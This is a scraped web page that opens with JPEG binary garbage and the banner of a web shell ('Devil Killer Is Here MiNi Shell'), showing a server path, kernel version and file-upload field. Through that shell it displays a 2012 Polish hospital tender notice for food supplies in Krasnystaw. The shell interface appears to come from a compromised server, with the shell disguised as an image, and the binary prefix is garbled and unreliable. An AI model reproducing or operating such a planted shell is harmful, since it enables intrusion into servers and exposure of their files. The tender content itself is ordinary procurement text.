JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/162999-N-2012.html

<p class="kh_header"><b>Krasnystaw: Dostawa artykułów spożywczych do Kuchni Szpitalnej Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie</b><br>
<b>Numer ogłoszenia: 162999 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie , ul. M. Sobieskiego 4, 22-300 Krasnystaw, woj. lubelskie, tel. 82 5762170, faks 82 5764901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozkrasnystaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samodzielny Publiczny Zespół Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do Kuchni Szpitalnej Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup artykułów spożywczych podzielony na 4 pakiety (zadania) wraz z dostawą do Kuchni Szpitalnej SPZOZ w Krasnymstawie:
-  Pakiet 1.  Mięso i wędliny 
-  Pakiet 2.  Nabiał 
-  Pakiet 3.  Przyprawy, sosy, koncentraty i zupy 
-  Pakiet 4.  Pieczywo 
2. Ofertę można składać na całość przedmiotu zamówienia lub na dane zadanie (pakiet) oddzielnie (oferta częściowa), co najmniej na jeden pakiet.
3. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do siwz. Podane ilości są szacunkowym zapotrzebowaniem na okres 12 miesięcy. 
4. Zamawiający zastrzega prawo do zakupu ilości określonego towaru stosownie do bieżących potrzeb i zapłaci do wysokości dokonanych zakupów, jednakże zmniejszenie nie będzie przekraczało 20% wartości umowy.
5. Nie dopuszcza się składania ofert wariantowych i alternatywnych.
6. Zamawiający nie przewiduje zamówień uzupełniających.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5, 15.50.00.00-3, 15.87.00.00-7, 15.87.12.60-4, 15.80.00.00-6, 15.81.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium. Wadium dla całego zamówienia wynosi: 7 500,00 zł (słownie: siedem tysięcy pięćset złotych), w tym dla poszczególnych części:
Pakiet 1	2 500,00 zł
Pakiet 2	2 500,00 zł
Pakiet 3	1 500,00 zł
Pakiet 4	1 000,00 zł
W przypadku złożenia oferty częściowej wykonawca zobowiązany jest wnieść wadium w kwocie określonej dla danej części (pakietu). W przypadku złożenia oferty na kilka części kwota wadium stanowi sumę wadiów ustalonych dla poszczególnych części zamówienia. Jeżeli wysokość wniesionego wadium będzie niższa niż suma wynikająca z poszczególnych części zamówienia, zamawiający uzna, że wadium nie zostało wniesione w wymaganej wysokości.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
2.1 pieniądzu,
2.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
2.3 gwarancjach bankowych,
2.4 gwarancjach ubezpieczeniowych, 
2.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy zamawiającego nr   35 1500 1373 1213 7001 1394 0000 prowadzony w Kredyt Bank S.A. z siedzibą w Warszawie, Oddział w Chełmie, Filia nr 5 w Krasnymstawie, 22-300 Krasnystaw, ul. Matysiaka 7 z dopiskiem: Wadium PN 6/2012 Dostawa artykułów spożywczych do Kuchni Szpitalnej SPZOZ w Krasnymstawie
4. Wykonawca powinien złożyć w ofercie dowód wniesienia wadium w przypadku wpłaty przelewem. Terminem wniesienia wadium jest data i czas uznania rachunku zamawiającego.
5. W przypadku wniesienia wadium w formach innych niż pieniądzu wykonawca zobowiązany jest dołączyć do oferty gwarancję bądź poręczenie w następujący sposób: kserokopię potwierdzoną za zgodność z oryginałem zszyć, zbindować lub w inny sposób trwale złączyć z ofertą, natomiast oryginał dokumentu należy złożyć wraz z ofertą w taki sposób aby była możliwość jego zwrócenia bez dekompletowania oferty. W przypadku, gdy oryginał dokumentu będzie zszyty, zbindowany lub w inny sposób trwale złączony z ofertą zamawiający nie dokona jego zwrotu. 
6. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
6.1 być wystawione na Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4, 22-300 Krasnystaw,
6.2 zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 5 ustawy,
6.3 w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań opisanych w art. 46 ust. 5 ustawy każdego z tych wykonawców,
6.4 okres ważności wadium nie może być krótszy niż okres związania ofertą, przy czym pierwszym dniem ważności zobowiązania jest dzień składania ofert.
7. Zamawiający zwróci wadium na zasadach określonych w art. 46 ustawy. W przypadku wniesienia wadium w pieniądzu, w ofercie należy podać nazwę, adres banku oraz numer konta, na jakie zamawiający dokonuje zwrotu wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, dotyczące:
a. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b. posiadania wiedzy i doświadczenia; 
c. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania  zamówienia;
d. sytuacji ekonomicznej i finansowej.
2. Wykonawcy w stosunku, do których brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie treści złożonych oświadczeń lub dokumentów: 
a. OŚWIADCZENIA O SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU ZGODNIE Z ART. 44 USTAWY, 
b. oświadczenia o braku podstaw do wykluczenia wykonawcy na podstawie art. 24 ust. 1 ustawy Pzp, 
c. treści złożonych dokumentów, których zamawiający wymaga w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz dokumentów wymaganych w celu wykazania braku podstaw do wykluczenia z postępowania.
Zamawiający dokonując oceny spełniania warunków udziału w postępowaniu przez wykonawcę będzie stosował formułę spełnia (nie spełnia).
Jeżeli treść złożonych oświadczeń lub treść złożonych dokumentów potwierdzi, że wykonawca spełnia warunki udziału w postępowaniu i nie ma podstaw do jego wykluczenia, to zamawiający odnotuje, że wykonawca warunki spełnia. W przypadku, gdy treść złożonych oświadczeń lub treść złożonych dokumentów nie potwierdzi, że wykonawca spełnia warunki udziału w postępowaniu lub są podstawy do jego wykluczenia, to zamawiający odnotuje, że wykonawca warunków nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 44 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
2. Oświadczenie wykonawcy o braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 ustawy (załącznik nr 3) lub oświadczenie dla osób fizycznych w zakresie art. 24 ust. 1 pkt. 2 ustawy (załącznik nr 4).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Stosowne zezwolenie, koncesja lub licencja - dopuszczające towar do obrotu handlowego, jeśli dotyczy.
2. Decyzja Państwowego Inspektoratu Sanitarnego dopuszczająca środki transportu wykonawcy do przewozu towaru.
3. Zaakceptowany (podpisany) projekt umowy - załącznik nr 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ewentualne pełnomocnictwo, jeśli uprawnienie do reprezentowania wykonawcy nie wynika z innych dokumentów załączonych przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dowód wniesienia wadium. W przypadku wniesienia wadium w formie gwarancji, do oferty należy dołączyć poświadczoną za zgodność z oryginałem kserokopię, a oryginał dostarczyć w osobnej kopercie wewnątrz składanej oferty.
2. Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy.
Przed podpisaniem umowy wykonawca, który jest osobą fizyczną prowadzącą działalność gospodarczą, jak również wykonawcy prowadzący wspólnie działalność na podstawie umowy spółki cywilnej zobowiązani są do przedstawienia aktualnych dokumentów rejestrowych oraz umowę spółki.
4. Zaświadczenie z właściwego Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
5. Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7. Wypełniony formularz oferta - załącznik nr 1
8. Wypełniony formularz kosztorysu cenowego - załącznik nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spzozkrasnystaw.pl/archiwalna_witryna/przetbiez.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4, 22-300 Krasnystaw w Dziale Techniczno-Gospodarczym, Zamówienia Publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2012 godzina 10:00, miejsce: Kancelaria Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4, 22-300 Krasnystaw.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Mięso i wędliny
Wadium 2 500,00 zł.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 	            J.m. 	 Ilość 
1.	Wołowina b/k udziec	kg	100
2.	Schab z/k	             kg       1 000
3.	Karkówka wieprz. b/k	kg	300
4.	Mięso wieprzowe kl 2	kg	200
5.	Łopatka wieprzowa bez kości	kg	400
6.	Kości wieprzowe schabowo-karkowe	kg	200
7.	Kark wołowy	kg	400
8.	Słonina wieprzowa płaty	kg	1 000
9.	Żeberka wieprzowe 	kg	200
10.	Wątroba wieprzowa 	kg	250
11.	Nogi wieprzowe	             kg	50
12.	Ozory wieprzowe	             kg	1 000
13.	Flaki wołowe suche krojone	kg	500
14.	Filet z indyka	             kg	250
15.	Filet z kurcząt świeży	kg	350
16.	Kurczaki kl. A świeże	kg	2 400
17.	Porcja kulinarna z kurcząt	kg	1 200
18.	Baleron gotowany	             kg	70
19.	Boczek b/ż wędzony parzony	kg	200
20.	Szynka gotowana	             kg	350
21.	Szynka wieprzowa w osłonce - szynkowa	kg	100
22.	Ogonówka wieprzowa	 kg	170
23.	Kiełbasa żywiecka	              kg	160
24.	Kiełbasa krakowska             	 kg	400
25.	Polędwica z indyka	              kg	180
26.	Kiełbasa biała parzona wieprzowa	kg	50
27.	Kiełbasa toruńska wieprzowa	             kg	250
28.	Schab pieczony	                          kg	50
29.	Kiełbasa zwyczajna wieprzowa	kg	270
30.	Szynka mielona	                          kg	130 
31.	Mielonka drobiowa	                          kg	80
32.	Polędwica sopocka	                          kg	130
33.	Szynka tyrolska wieprzowa	             kg	70
34.	Baleron drobiowy	                          kg	170
35.	Kaszanka                                     	kg	350
36.	Kiszka pasztetowa wieprzowa z manną	kg	160
37.	Salceson włoski	                         kg	130
38.	Kiełbasa parówkowa	            kg	350
39.	Mortadela wieprzowa	            kg	700
40.	Parówki delikatesowe wieprzowe        kg	100
41.	Pieczeń wiedeńska wieprzowa z papryką	kg	100
42.	Serdelki drobiowe	                         kg	200
43.	Konserwa turystyczna wieprzowa a 450 g.	szt.	400
44.	Pieczeń rzymska	kg	50
45.	Pasztet mazowiecki wieprzowy 450 g słoik	szt.	1 000
46.	Smalec paczkowany 0,200 g               kg	600
47.	Kiszka pasztetowa drobiowa	              kg	130.</p></li>
